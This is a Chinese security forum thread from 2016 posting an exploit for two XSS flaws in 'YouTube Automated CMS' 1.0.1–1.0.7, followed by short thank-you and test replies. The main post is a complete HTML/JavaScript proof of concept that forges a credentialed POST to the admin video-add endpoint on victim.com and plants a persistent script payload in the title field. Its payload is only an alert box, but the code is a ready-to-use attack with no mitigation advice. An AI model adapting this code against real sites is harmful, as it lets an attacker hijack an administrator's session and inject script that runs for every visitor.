YouTube 自动化CMS 1.0.7两处XSS

90_ · 发表于 2016-10-19 16:14:15

演示视频：https://youtu.be/cCtThSquNSk

CSRF to 持续性 XSS
Version: 1.0.1 to 1.0.7

CSRF Exploit Code:

[HTML] 纯文本查看 复制代码

<html>
  <body>
   <title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
        xhr.withCredentials = true;
        var body = "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"details\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"category_id\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"published\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"duration\"\r\n" + 
          "\r\n" + 
          "70\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"image\"\r\n" + 
          "\r\n" + 
          "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" + 
          "-----------------------------1681718590736\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------1681718590736--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <br><br><br>
    <center>
    <h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </center>
  </body>
</html>

08sec-君子 · 发表于 2016-10-19 17:36:27

谢谢分享

apptest · 发表于 2016-10-19 18:06:21

APP回复测试

Te5tB99 · 发表于 2016-10-19 18:07:14

test？

xiaoye · 发表于 2016-10-19 18:18:06

如果无法播放，请点击此处在新窗口打开

admia · 发表于 2016-10-20 17:15:39

我他妈一直新手上路

YouTube 自动化CMS 1.0.7两处XSS

相关帖子

指导单位

旗下站点

联系我们